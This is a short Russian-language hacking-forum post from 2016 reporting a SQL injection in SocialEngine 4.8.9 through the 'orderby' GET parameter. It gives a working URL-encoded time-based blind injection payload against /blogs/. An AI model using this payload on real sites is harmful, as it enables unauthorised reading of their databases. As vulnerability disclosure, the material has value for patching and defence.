1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Socialengine 4.8.9 - sql injection

Тема в разделе "Уязвимости популярных CMS", создана пользователем v1nest, 10 апр 2016.

  1. v1nest
    v1nest Выёбистый СМ ^^ Команда форума Глобальный модератор
    Симпатии:
    52
    High-Tech Bridge Research Lab Security обнаружили sql-инъекцию в SocialEngine 4.8.9
    SQL-инъекция происходит из-за недостаточной фильтрации входных данных, передаваемых через "OrderBy" HTTP GET параметра на "/index.php" .
    Код:
    http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29
    
     
    10 апр 2016

Поделиться этой страницей

Загрузка...